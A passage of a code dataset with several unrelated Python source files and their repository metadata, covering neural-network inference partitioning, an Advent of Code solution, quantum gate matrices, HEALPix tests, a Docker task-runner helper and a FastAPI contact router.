{'type': 'upsample', 'scale_factor': layer.scale_factor}\n elif layer == 'concat':\n layer_config = {'type': layer}\n else: # only given kinds of layers\n layer_config = None\n print('This type of layer is not supported yet')\n\n return layer_config\n\n\n# from output range to input range\ndef output_input(output_range: tuple, layer_config=None) -> tuple:\n o_s, o_e = output_range\n layer_type = layer_config['type']\n if layer_type in ['relu', 'concat']: # most activation layers\n return output_range\n elif layer_type == 'upsample':\n scale_factor = layer_type['scale_factor']\n return round(o_s / scale_factor), round(o_e / scale_factor)\n elif layer_type in ('conv', 'basicConv', 'maxpool'):\n kernel_size, stride, padding = layer_config['kernel_size'], layer_config['stride'], layer_config['padding']\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size, kernel_size)\n if isinstance(stride, int):\n stride = (stride, stride)\n if padding != 0:\n padding = padding[1]\n return o_s * stride[1] - padding, (o_e - 1) * stride[1] + kernel_size[1] - padding\n else:\n print('Unknown layer type')\n\n\n# generate execution units\ndef gen_inputDependency(model, layer_list, topology_list, output_partitions, last_array):\n # required input: from which layer, input range(in the -1 dimension )\n ids = [list() for _ in range(len(topology_list))]\n for l in topology_list: # 当前这层\n partition = output_partitions[l]\n\n # if layers[l] == 'concat':\n # last_division = tuple(len(partitions[last_layer]) - 1 for last_layer in last_array[l])\n # required_input = (last_array[l], last_division)\n # layer_config = {'type': 'concat'}\n # ids[l].append((required_input, layer_config, []))\n # else:\n if l == 0:\n H = model.input_shape[-1]\n else:\n H = model.output_shapes[last_array[l][0]][-1]\n for i in range(len(partition) - 1):\n # get output range\n output_range = partition[i: i + 2] # [o_s, o_e)\n layer = layer_list[l]\n # get corresponding input range\n if isinstance(layer, BasicConv2d):\n # type = 'conv'\n # if isinstance(layer, BasicConv2d):\n conv = layer.conv\n # bn = layer.bn\n type = 'basicConv'\n layer_config = {'type': type, 'kernel_size': conv.kernel_size, 'stride': conv.stride,\n 'padding': conv.padding} #, 'bn_args': (bn.weight, bn.bias, False, bn.momentum, bn.eps)}\n i_s, i_e = input_range = output_input(output_range, layer_config) # [i_s, i_e)\n if conv.padding == 0:\n padding = (0, 0, 0, 0)\n else:\n if i_s < 0:\n upper_padding = -i_s\n i_s = 0\n else:\n upper_padding = 0\n if i_e > H:\n bottom_padding = i_e - H\n i_e = H\n else:\n bottom_padding = 0\n padding = (upper_padding, bottom_padding, *conv.padding)\n input_range = (i_s, i_e)\n layer_config['padding'] = padding\n\n elif isinstance(layer, nn.MaxPool2d): # padding = 0 for most maxpool layers\n layer_config = {'type': 'maxpool', 'kernel_size': layer.kernel_size, 'stride': layer.stride,\n 'padding': layer.padding, 'ceil_mode': layer.ceil_mode}\n i_s, i_e = input_range = output_input(output_range, layer_config) # [i_s, i_e)\n\n if layer.padding == 0:\n padding = (0, 0)\n else:\n padding = layer.padding\n # else:\n if i_s < 0:\n upper_padding = -i_s\n i_s = 0\n else:\n upper_padding = 0\n if i_e > H:\n bottom_padding = i_e - H\n i_e = H\n else:\n bottom_padding = 0\n padding = (upper_padding, bottom_padding, *padding)\n input_range = (i_s, i_e)\n layer_config['padding'] = padding\n\n elif isinstance(layer, nn.Upsample):\n layer_config = {'type': 'upsample', 'scale_factor': layer.scale_factor}\n input_range = output_input(output_range, layer_config)\n elif layer == 'concat':\n layer_config = {'type': layer}\n input_range = output_range\n elif isinstance(layer, (nn.Sigmoid, nn.ReLU, nn.Dropout, nn.BatchNorm2d)):\n layer_config = {'type': 'bijective'}\n input_range = output_range\n else:\n input_range = None\n layer_config = None\n\n required_input = (last_array[l], input_range)\n ids[l].append((required_input, layer_config, []))\n\n return ids\n\n\n# for w in workload_dependency:\n# print(w)\n\n\n# def gen_forwarding(input_dependency: list, topology_list: list, dependency_list: list):\n# for nl in topology_list: # this layer\n# lasts = dependency_list[nl]\n# if len(lasts) == 1: # only depends on one layer, can be the next_array layer of concat\n# for i, n in enumerate(input_dependency[nl]): # execution units of this layers\n# last_layer, input_range = n[0]\n# last_layer = last_layer[0]\n# last_partition = partitions[last_layer] # partition of last_array layer's output\n# if last_partition == 1: # last_array layer is concat, has whole input\n# input_dependency[last_layer][0][2].append((i, input_range))\n# else:\n# # formation = [] # the formation of layer's input\n# for j in range(len(last_partition) - 1):\n# left_max = max(last_partition[j], input_range[0])\n# right_min = min(last_partition[j + 1], input_range[1])\n# if left_max < right_min: # overlap\n# overlap = (left_max, right_min)\n# input_dependency[last_layer][j][2].append((i, overlap))\n# # formation.append((n, overlap))\n# else: # concat layer\n# for last_array in lasts:\n# last_partition = partitions[last_array]\n# for i in range(len(last_partition) - 1):\n# input_dependency[last_array][i][2].append((0, (partitions[last_array][i], partitions[last_array][i + 1])))\n\n\ndef gen_forwarding(n_device: int, input_dependency, topology_list, next_layers, output_partitions):\n for l in topology_list: # layer nl\n nexts = next_layers[l] # next_array layers\n partition = output_partitions[l]\n if len(nexts) == 0: # output of final layer should send back to master\n continue\n # input_dependency[l][0][2].append(1)\n # if layers[l] == 'concat': # layer l is concat\n # forwarding = [[] for _ in range(n_device)]\n # for nl in nexts:\n # for i, eu in enumerate(input_dependency[nl]):\n # input_range = eu[0][1]\n # forwarding[i].append(input_range)\n # for to_device, f in enumerate(forwarding): # d为设备号\n # if len(f) > 0: # 按照转发对应的设备号去重\n # for interval in get_set_union(f):\n # input_dependency[l][0][2].append((to_device, interval))\n # elif len(nexts) == 1 and layers[nexts[0]] == 'concat': # next_array layer is concat\n # for i in range(len(partition) - 1):\n # input_dependency[l][i][2].append((0, (0, partition[i + 1] - partition[i]), partition[i]))\n # else: # no concat layer between this layer and next_array layer\n for nl in nexts:\n for i in range(len(partition) - 1):\n forwarding = [[] for _ in range(n_device)] # 未去重的forwarding\n for j, eu in enumerate(input_dependency[nl]):\n _, input_range = eu[0]\n overlap = get_intersection((partition[i], partition[i + 1]), input_range)\n if overlap is not None:\n forwarding[j].append(overlap)\n for to_device, f in enumerate(forwarding): # d: device_id\n if len(f) > 0: # 按照转发对应的设备号去重\n for interval in get_set_union(f):\n input_dependency[l][i][2].append(\n (to_device, (interval[0] - partition[i], interval[1] - partition[i]), partition[i]))\n\n\n# for eu in workload_dependency:\n# print(eu)\n\n\ndef gen_executionUnits(n_device: int, workload_partition, topology_list):\n device_group = [[] for _ in range(n_device)]\n for l in topology_list: # current layer\n for i, eu in enumerate(workload_partition[l]):\n device_group[i].append(\n ExecutionUnit(required_input=eu[0], operator=eu[1], forwarding=eu[2], layer_num=l, device_num=i))\n return device_group","repo_name":"Leosang-lx/DistributedInference","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":16719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13810166072","text":"import numpy as np\nwith open('input.txt') as f:\n data = f.read().split('\\n')\n\n\ndef translate_pixel(char):\n if char == '#':\n return 1\n if char == '.':\n return 0\n\n\nIMAGE_DICTIONARY = [translate_pixel(char) for char in data[0]]\nNUM_ENHANCEMENTS = 50\nFLIP_EDGES = True\n\nbase_image = np.array([[translate_pixel(char) for char in entry] for entry in data[2:]])\n\nexpansion = 4*NUM_ENHANCEMENTS+4\nIMAGE = np.zeros((base_image.shape[0]+expansion, base_image.shape[1]+expansion))\n\nIMAGE[2*NUM_ENHANCEMENTS+2:-2*NUM_ENHANCEMENTS-2, 2*NUM_ENHANCEMENTS+2:-2*NUM_ENHANCEMENTS-2] = base_image\n\n\ndef process(image, edges, image_dictionary=IMAGE_DICTIONARY):\n output_image = np.zeros(shape=image.shape)\n for column in range(1, image.shape[1] - 1):\n k = 2\n row0 = (image[0, column-1:column+2]*np.array([4,2,1])).sum()\n row1 = (image[1, column-1:column+2]*np.array([4,2,1])).sum()\n row2 = (image[k, column-1:column+2]*np.array([4,2,1])).sum()\n output_image[k-1, column] = image_dictionary[int(row2 + 8*row1 + 64*row0)]\n while k < image.shape[0]:\n row0 = row1\n row1 = row2\n row2 = (image[k, column-1:column+2]*np.array([4,2,1])).sum()\n output_image[k - 1, column] = image_dictionary[int(row2 + 8 * row1 + 64 * row0)]\n k += 1\n if FLIP_EDGES:\n output_image[0, :] = edges\n output_image[-1, :] = edges\n output_image[:, 0] = edges\n output_image[:, -1] = edges\n return output_image\n\n\nfor k in range(NUM_ENHANCEMENTS):\n print(k)\n IMAGE = process(IMAGE, ((k+1) % 2))\n\nprint(IMAGE.sum())","repo_name":"nbridgland/Advent2021","sub_path":"python/day20/day20.py","file_name":"day20.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4035545415","text":"import numpy as np\n\n\nclass Ray:\n origin = np.zeros(3)\n direction = np.zeros(3)\n\n def __init__(self, origin, direction):\n self.origin = origin\n self.direction = direction\n\n def point_at(self, t):\n return self.origin + t * self.direction\n\n\nif __name__ == '__main__':\n o = np.array([0, 1, 2])\n d = np.array([3, 4, 5])\n r = Ray(o, d)\n print(f\"{r.origin} + 3 * {r.direction} = {r.point_at(3)}\")\n","repo_name":"tarrows/raytracing1w","sub_path":"ray.py","file_name":"ray.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10337672088","text":"\"\"\"\nThis is just some stuff to help when doing some computations.\nIts not really intended for plotting since most of them time the result\nof applying some operator has complex parts.\n\nI'd check out QuTiP for plotting on the Bloch sphere.\n\"\"\"\nimport matplotlib\n\ntry:\n matplotlib.use('Qt5Agg')\nexcept ValueError as e:\n print('Error: matplotlib backend\\n', e)\n print('Trying:', matplotlib.get_backend())\n matplotlib.use(matplotlib.get_backend())\nfinally:\n import matplotlib.pyplot as plt\n\nimport numpy as np\nfrom numpy import linalg as la\n\n\"\"\"\nSome quantum gate matrices\nSince each is numpy matrix, the adjoint for some operator P is P.H : \n\"\"\"\n\n# One, two and three parameter unitary operators\nU3 = lambda theta, phi, rho: np.mat([[np.cos(theta / 2), -np.exp(1j * rho) * np.sin(theta / 2)],\n [np.exp(1j * phi) * np.sin(theta / 2),\n np.exp(1j * rho + 1j * phi) * np.cos(theta / 2)]])\nU2 = lambda phi, rho: U3(np.pi / 2, phi, rho)\nU1 = lambda rho: U3(0, 0, rho)\n\n# Rotation gates (x,y,z)\nRx = lambda theta: U3(theta, -np.pi / 2, np.pi / 2)\nRy = lambda theta: U3(theta, 0, 0)\nRz = lambda phi: U1(phi)\n\n\"\"\"\nX: NOT (bit flip)\nZ: Phase flip\nY: Bit and phase flip\nH: Hadamard gate \nS: sqrt(Z), pi/2 phase rotation\nT: pi/4 phase rotation \n\"\"\"\nX = U3(np.pi, 0, np.pi)\nY = U3(np.pi, np.pi / 2, np.pi / 2)\nZ = U1(np.pi)\nH = U2(0, np.pi)\nS = U1(np.pi / 2)\nT = U1(np.pi / 4)\n\n# Controlled-NOT gate\nCNOT = np.mat([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 0, 1],\n [0, 0, 1, 0]])\n\n\n# ===== simple example, put basis vectors in superpositon and plot(2d)\nfig, ax = plt.subplots()\nhw, hl = 0.1, 0.1\n\n# ground and excited states |0> and |1>\nket0 = np.mat('1;0')\nket1 = np.mat('0;1')\n\n# Superpositons |+> and |->\nb1 = np.real(H * ket0)\nb2 = np.real(H * ket1)\n\n\n# Plot some vectors\nk0 = ax.arrow(0, 0, ket0[0, 0], ket0[1, 0],\n fc='C0', ec='C0', alpha=1, linestyle='-', head_width=hw, head_length=hl,\n label=\"$\\\\vert 0 \\\\rangle $\")\n\nh0 = ax.arrow(0, 0, b1[0, 0], b1[1, 0],\n fc='C0', ec='C0', alpha=0.5, linestyle='-', head_width=hw, head_length=hl,\n label=\"$\\\\vert + \\\\rangle $\")\n\nk1 = ax.arrow(0, 0, ket1[0, 0], ket1[1, 0],\n fc='C1', ec='C1', alpha=1, linestyle='-', head_width=hw, head_length=hl,\n label=\"$\\\\vert 1 \\\\rangle $\")\n\nh1 = ax.arrow(0, 0, b2[0, 0], b2[1, 0],\n fc='C1', ec='C1', alpha=0.5, linestyle='-', head_width=hw, head_length=hl,\n label=\"$\\\\vert - \\\\rangle $\")\n\nax.legend(handles=[k0, k1, h0, h1],\n bbox_to_anchor=(1.05, 1),\n loc=2,\n borderaxespad=0)\n\nax.axhline(color='k', alpha=0.2)\nax.axvline(color='k', alpha=0.2)\ns = 1.2\nax.axis([-s, s, -s, s])\nax.set_aspect('equal')\nplt.show()","repo_name":"johnharakas/quantum-qiskit","sub_path":"linalg-tools.py","file_name":"linalg-tools.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9130426941","text":"import math\nimport scipy.constants\nimport scipy.stats\nimport numpy as np\n\ndef wmom(arrin, weights_in, inputmean=None, calcerr=False, sdev=False):\n \"\"\"\n NAME:\n wmom()\n \n PURPOSE:\n Calculate the weighted mean, error, and optionally standard deviation of\n an input array. By default error is calculated assuming the weights are\n 1/err^2, but if you send calcerr=True this assumption is dropped and the\n error is determined from the weighted scatter.\n\n CALLING SEQUENCE:\n wmean,werr = wmom(arr, weights, inputmean=None, calcerr=False, sdev=False)\n \n INPUTS:\n arr: A numpy array or a sequence that can be converted.\n weights: A set of weights for each elements in array.\n OPTIONAL INPUTS:\n inputmean: \n An input mean value, around which them mean is calculated.\n calcerr=False: \n Calculate the weighted error. By default the error is calculated as\n 1/sqrt( weights.sum() ). If calcerr=True it is calculated as sqrt(\n (w**2 * (arr-mean)**2).sum() )/weights.sum()\n sdev=False: \n If True, also return the weighted standard deviation as a third\n element in the tuple.\n\n OUTPUTS:\n wmean, werr: A tuple of the weighted mean and error. If sdev=True the\n tuple will also contain sdev: wmean,werr,wsdev\n\n REVISION HISTORY:\n Converted from IDL: 2006-10-23. Erin Sheldon, NYU\n\n \"\"\"\n \n # no copy made if they are already arrays\n arr = numpy.array(arrin, ndmin=1, copy=False)\n \n # Weights is forced to be type double. All resulting calculations\n # will also be double\n weights = numpy.array(weights_in, ndmin=1, dtype='f8', copy=False)\n \n wtot = weights.sum()\n \n # user has input a mean value\n if inputmean is None:\n wmean = ( weights*arr ).sum()/wtot\n else:\n wmean=float(inputmean)\n\n # how should error be calculated?\n if calcerr:\n werr2 = ( weights**2 * (arr-wmean)**2 ).sum()\n werr = numpy.sqrt( werr2 )/wtot\n else:\n werr = 1.0/numpy.sqrt(wtot)\n\n # should output include the weighted standard deviation?\n if sdev:\n wvar = ( weights*(arr-wmean)**2 ).sum()/wtot\n wsdev = numpy.sqrt(wvar)\n return wmean,werr,wsdev\n else:\n return wmean,werr","repo_name":"mantidproject/vesuvio","sub_path":"unpackaged/vesuvio_calibration/weighted_average.py","file_name":"weighted_average.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74067601528","text":"try:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom sheet.parser.fl_cell_range_parse_node import FLCellRangeParseNode\nfrom sheet.parser.parse_node import ParseNode\nfrom sheet.parser.fl_cell_reference_parse_node import FLCellReferenceParseNode\n\nclass FLCellRangeParseNodeTest(unittest.TestCase):\n\n def testConstructor(self):\n flCellRange = FLCellRangeParseNode([\"A1\", \":\", \"D2\"])\n self.assertEquals(flCellRange.type, ParseNode.FL_CELL_RANGE,\n \"Node was of the wrong type\")\n self.assertEquals(flCellRange.children, [\"A1\", \":\", \"D2\"],\n \"Node had the wrong children\")\n\n def testStr(self):\n node = FLCellRangeParseNode([\"a1\", \":\", \"g8\"])\n self.assertEquals(str(node),\n \"\",\n \"Wrong string representation\")\n\n\n def testRegisteredWithParse(self):\n \"test registered with ParseNode\"\n self.assertEquals(\n type(ParseNode.construct_node(\n ParseNode.FL_CELL_RANGE, ['a1', ':', 'b4'])),\n FLCellRangeParseNode,\n \"Class is not registered with ParseNode\")\n\n\n def testCellReferences(self):\n first = FLCellReferenceParseNode(['a1'])\n second = FLCellReferenceParseNode(['g8'])\n node = FLCellRangeParseNode([first, \":\", second])\n\n self.assertEquals(node.first_cell_reference, first)\n self.assertEquals(node.second_cell_reference, second)\n\n another = FLCellReferenceParseNode(['c2'])\n node.first_cell_reference = another\n self.assertEquals(node.first_cell_reference, another)\n\n node.second_cell_reference = another\n self.assertEquals(node.second_cell_reference, another)\n\n\n def testColon(self):\n first = FLCellReferenceParseNode(['a1'])\n second = FLCellReferenceParseNode(['g8'])\n node = FLCellRangeParseNode([first, \":\", second])\n self.assertEquals(node.colon, \":\")\n\n\n\n","repo_name":"pythonanywhere/dirigible-spreadsheet","sub_path":"dirigible/sheet/tests/parser/test_fl_cell_range_parse_node.py","file_name":"test_fl_cell_range_parse_node.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"77"} +{"seq_id":"11071100472","text":"from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash\nimport datetime, os\n\nDEBUG = True\napp = Flask(__name__)\napp.config.from_object(__name__)\n \n###############################################\n#Routes\n###############################################\n@app.route('/')\ndef home():\n return render_template('home.html', title='home', page='home') \n\nif __name__ == '__main__':\n app.run()\n \napplication = app","repo_name":"GeorgeErickson/htmlfresh","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"4225319474","text":"import unittest\nimport logging\nimport os\nimport datetime\nimport numpy as np\n\nfrom disko import HealpixSubSphere, HealpixSphere\nfrom disko import fov\n\nLOGGER = logging.getLogger(__name__)\n# Add a null handler so logs can go somewhere\nLOGGER.addHandler(logging.NullHandler())\nLOGGER.setLevel(logging.INFO)\n\n\nclass TestSubsphere(unittest.TestCase):\n\n def setUp(self):\n # Theta is co-latitude measured southward from the north pole\n # Phi is [0..2pi]\n self.sphere = HealpixSubSphere(res_arcmin=60.0,\n theta=np.radians(10.0),\n phi=0.0, radius_rad=np.radians(1))\n self.sphere.set_info(timestamp=datetime.datetime.now(),\n lon=170.5, lat=-45.5, height=42)\n\n def test_area(self):\n sky = HealpixSphere(nside=128)\n\n self.assertAlmostEqual(sky.get_area(), 4*np.pi)\n\n hemisphere = HealpixSubSphere(res_arcmin=60.0,\n theta=np.radians(0.0),\n phi=0.0, radius_rad=np.radians(90))\n self.assertAlmostEqual(hemisphere.get_area(), 2*np.pi, 1)\n\n def test_copy(self):\n sky = HealpixSphere(nside=128)\n sky2 = sky.copy()\n sky.pixels += 1\n self.assertFalse(np.allclose(sky.pixels, sky2.pixels))\n self.assertTrue(np.allclose(sky.pixel_areas, sky2.pixel_areas))\n self.assertEqual(sky.nside, sky2.nside)\n sph3 = self.sphere.copy()\n sph3.pixels += 1\n self.assertFalse(np.allclose(self.sphere.pixels, sph3.pixels))\n self.assertTrue(np.allclose(self.sphere.pixel_areas, sph3.pixel_areas))\n\n def test_big_subsphere(self):\n # Check that a full subsphere is the same as the sphere.\n res_deg = 3.0\n big = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(180))\n old = HealpixSphere(32)\n\n self.assertEqual(big.nside, 32)\n self.assertEqual(big.npix, old.npix)\n\n def test_tiny_subsphere(self):\n # Check that a full subsphere is the same as the sphere.\n res_deg = 0.5\n tiny = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0),\n phi=0.0, radius_rad=np.radians(5))\n\n self.assertEqual(tiny.nside, 128)\n self.assertEqual(tiny.npix, 364)\n\n def test_sizes(self):\n self.assertEqual(self.sphere.npix, self.sphere.el_r.shape[0])\n self.assertEqual(self.sphere.npix, self.sphere.l.shape[0])\n\n def test_svg(self):\n res_deg = 10\n fname = 'test.svg'\n big = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(45))\n\n big.to_svg(fname=fname, pixels_only=True, show_cbar=False)\n self.assertTrue(os.path.isfile(fname))\n os.remove(fname)\n\n def test_fits(self):\n res_deg = 10\n fname = 'test.fits'\n big = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(45))\n\n big.to_fits(fname=fname)\n self.assertTrue(os.path.isfile(fname))\n os.remove(fname)\n\n def test_load_save(self):\n res_deg = 10\n sph = HealpixSubSphere(res_arcmin=res_deg*60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(45))\n\n sph.set_info(timestamp=datetime.datetime.now(),\n lon=170.5, lat=-45.5, height=42)\n\n sph.to_hdf('test.h5')\n\n sph2 = fov.from_hdf('test.h5')\n\n self.assertTrue(np.allclose(sph.pixels, sph2.pixels))\n self.assertTrue(np.allclose(sph.pixel_areas, sph2.pixel_areas))\n self.assertTrue(np.allclose(sph.pixel_indices, sph2.pixel_indices))\n\n def test_indexing(self):\n sph = HealpixSubSphere(res_arcmin=60.0,\n theta=np.radians(0.0), phi=0.0,\n radius_rad=np.radians(90))\n\n for i in range(500):\n el = np.random.uniform(np.radians(1), np.radians(90))\n az = np.random.uniform(np.radians(-180), np.radians(180))\n ind = sph.index_of(el, az)\n self.assertTrue(ind < sph.npix)\n","repo_name":"tmolteno/disko","sub_path":"disko/tests/test_subsphere.py","file_name":"test_subsphere.py","file_ext":"py","file_size_in_byte":4456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"8355338457","text":"def bubble(alist):\n for i in range(len(alist) - 1, 0, -1):\n for t in range(i):\n if a[t] > a[t + 1]:\n a[t], a[t + 1] = a[t + 1], a[t]\n return alist\n\n\na = [11, 333, 2423, 22, 5, 32, 3]\nb = bubble(a)\nprint(b)\n","repo_name":"tjhlp/numpytest","sub_path":"numpytest/test/test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36729474550","text":"from Products.CMFCore.utils import getToolByName\nfrom Products.Five import BrowserView\nfrom Products.statusmessages.interfaces import IStatusMessage\nfrom zope.interface import implements, Interface\n\nTYPES_WHITE_LIST = ['Folder', 'Image']\n\n\nclass ITranslateContentsView(Interface):\n \"\"\"\n TranslateContents view interface\n \"\"\"\n\n\nclass TranslateContentsView(BrowserView):\n \"\"\"\n TranslateContents browser view\n \"\"\"\n implements(ITranslateContentsView)\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.language = request.get('LANGUAGE')\n self.dig = request.get('dig', True)\n\n def __call__(self):\n catalog = getToolByName(self.context, 'portal_catalog')\n\n query = dict(\n portal_type = TYPES_WHITE_LIST,\n )\n\n if self.dig:\n query['path'] = '/'.join(self.context.getPhysicalPath())\n else:\n query['path'] = {'query': '/'.join(self.context.getPhysicalPath()), 'depth': 1}\n\n brains = catalog(query)\n\n processed = 0\n\n langs = [x for x in self.getLanguages() if x != self.language]\n\n totals = len(brains)\n\n brains = [x for x in brains]\n\n # we sort brains on path length so we always start translating from the container\n brains.sort(lambda x, y: cmp(len(x.getPath().split('/')), len(y.getPath().split('/'))))\n\n # link already present same id content if not linked\n\n for brain in brains:\n processed += 1\n self.context.plone_log('Processing [%s] %s of %s' % (brain.Title, processed, totals))\n obj = brain.getObject()\n\n for lang in langs:\n if not obj.hasTranslation(lang):\n\n # if we have same ids in translated parent we link them\n # we consider this lika a precondition\n parent = obj.aq_parent\n if parent.hasTranslation(lang):\n translated_parent = parent.getTranslation(lang)\n obj_id = obj.getId()\n if obj_id in translated_parent.keys():\n translation = getattr(translated_parent, obj_id)\n obj.linkTranslation(link_language = lang, link_content = translation.UID())\n self.context.plone_log(\"--> linking %s for %s\" % (obj_id, lang))\n continue\n\n # else we simply create new language content\n self.context.plone_log(\"--> %s creating\" % lang)\n translated = obj.addTranslation(lang)\n\n translated.setTitle(obj.Title())\n translated.reindexObject()\n else:\n self.context.plone_log(\"--> %s already exists\" % lang)\n\n IStatusMessage(self.request).addStatusMessage(u\"Immagini tradotte correttamente\", type = 'info')\n response = self.request.RESPONSE\n return response.redirect(self.context.absolute_url())\n\n def getLanguages(self):\n \"\"\"\n Return list of active langauges as ordered dictionary, the preferred first language as the first.\n\n Example output::\n\n {\n u'fi': {u'id' : u'fi', u'flag': u'/++resource++country-flags/fi.gif', u'name': u'Finnish', u'native': u'Suomi'},\n u'de': {u'id' : u'de', u'flag': u'/++resource++country-flags/de.gif', u'name': u'German', u'native': u'Deutsch'},\n u'en': {u'id' : u'en', u'flag': u'/++resource++country-flags/gb.gif', u'name': u'English', u'native': u'English'},\n u'ru': {u'id' : u'ru', u'flag': u'/++resource++country-flags/ru.gif', u'name': u'Russian', u'native': u'\\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439'}\n }\n \"\"\"\n result = {}\n\n portal_languages = self.context.portal_languages\n\n # Get barebone language listing from portal_languages tool\n langs = portal_languages.getAvailableLanguages()\n\n preferred = portal_languages.getPreferredLanguage()\n\n # Preferred first\n for lang, data in langs.items():\n if lang == preferred:\n result[lang] = data\n\n # Then other languages\n for lang, data in langs.items():\n if lang != preferred:\n result[lang] = data\n\n # For convenience, include the language ISO code in the export,\n # so it is easier to iterate data in the templates\n for lang, data in result.items():\n data[\"id\"] = lang\n\n return result\n","repo_name":"Umanot/Site","sub_path":"umanot.site/umanot/site/browser/translate_contents.py","file_name":"translate_contents.py","file_ext":"py","file_size_in_byte":4611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"821576502","text":"import io\nimport logging\nimport tarfile\nfrom typing import Any, List\n\nfrom docker import DockerClient\n\n\nclass ContentFile:\n \"\"\" This class represents a file with content and the files' path.\n \"\"\"\n def __init__(self, filepath: str, content: Any):\n \"\"\" Initialize a ContentFile instance.\n\n :param filepath: filepath of file\n :param content: content of file\n \"\"\"\n self.filepath = filepath\n self.content = content\n\n\nclass DockerContainer:\n \"\"\" This class represents Docker containers.\n \"\"\"\n def __init__(self, name: str, docker_client: DockerClient):\n \"\"\" Initialize a DockerContainer instance.\n\n :param name: name of container\n :param docker_client: docker client\n \"\"\"\n self.result_observers = []\n self.name = name\n self.docker_client = docker_client\n self.phy_container = self.docker_client.containers.get(self.name)\n\n def upload_content_files(self, content_files: List[ContentFile]):\n \"\"\" Upload a list of config files.\n\n :param content_files: list of config files\n :return: None\n \"\"\"\n logging.info(\"Creating archive...\")\n\n # create archive with content files\n fh = io.BytesIO()\n with tarfile.open(fileobj=fh, mode='w') as tar:\n for content_file in content_files:\n data = content_file.content.encode(\"utf-8\")\n info = tarfile.TarInfo(content_file.filepath)\n info.size = len(data)\n tar.addfile(info, io.BytesIO(initial_bytes=data))\n\n # upload tar file\n self._upload_tar_file_inner(fh.getvalue())\n\n def _upload_tar_file_inner(self, tar_data: tarfile):\n \"\"\" Upload a tar file to the container.\n\n :param tar_data: tar file with ContentFiles\n :return: None\n \"\"\"\n self.phy_container.start()\n logging.info(\"Uploading content files...\")\n self.phy_container.put_archive(path=\"/home/sage/sage\", data=tar_data)\n\n def run_task_solver(self, command: str, request_id: int):\n \"\"\" Run the container with specified command and notify observers with result.\n\n :param command: command to run\n :param request_id: ID of request\n :return: None\n \"\"\"\n logging.info(f\"Running command for request {request_id}: {command}\")\n # start container and run command\n self.phy_container.start()\n result = self.phy_container.exec_run(cmd=command, workdir=\"/home/sage/sage\", tty=True)\n\n # process result\n # TODO: use exit code to get result\n output_string = result.output.decode(\"utf-8\").strip()\n if not output_string:\n logging.error(f\"No output log from task request {request_id} received!\")\n output_log_entries = output_string.split(\"\\n\")\n\n # check if is correct and send result to observers\n is_correct = output_log_entries[-1] == \"True\"\n self.call_observers(request_id, is_correct)\n\n def add_result_observer(self, observer):\n \"\"\" Add observers for new results.\n\n :param observer: function to be triggered\n :return: None\n \"\"\"\n self.result_observers.append(observer)\n\n def call_observers(self, request_id: int, result: bool):\n \"\"\" Call all registered observers.\n\n :param request_id: ID of request\n :param result: task result\n :return: None\n \"\"\"\n for observer in self.result_observers:\n observer(request_id, result)\n\n def vanish(self):\n \"\"\" Remove this container.\n\n :return: None\n \"\"\"\n try:\n logging.info(f\"Removing container {self.name}...\")\n self.phy_container.stop()\n self.phy_container.remove()\n except:\n pass\n","repo_name":"MathGrass/mathgrass-local-mq-evaluator","sub_path":"docker_container.py","file_name":"docker_container.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23116191477","text":"from fastapi import APIRouter\nfrom pydantic import BaseModel\nfrom Models.Persona import Persona\nfrom Models.Contacto import Contacto\nfrom bbdd import engine\nfrom sqlalchemy.orm import Session\nfrom fastapi import Depends\nfrom .Auth import checkear_logueo\n\n\nrouter = APIRouter(\n prefix=\"/contacto\",\n tags=[\"Contacto\"]\n)\n\nclass contactoJson (BaseModel):\n idPersona: int\n valor: str\n\n#add telefono a persona por idpersona ingresados por json\n@router.put(\"/agregarTelefono\")\nasync def agregar_telefono(contacto: contactoJson, user: str = Depends(checkear_logueo)):\n try:\n with Session(engine) as sesion: \n personaDB = sesion.query(Persona).filter(Persona.id == contacto.idPersona).first()\n if personaDB is None:\n return {\"message\": \"No se ha encontrado la persona\"}\n else:\n contactoDB = Contacto(tipoContacto=\"Telefono\", valor=contacto.valor)\n personaDB.contactos.append(contactoDB)\n sesion.commit()\n sesion.refresh(personaDB)\n\n return {\"message\": \"Telefono agregado a la persona\",\n \"id\": personaDB.id,\n \"nombre\": personaDB.nombre,\n \"apellido\": 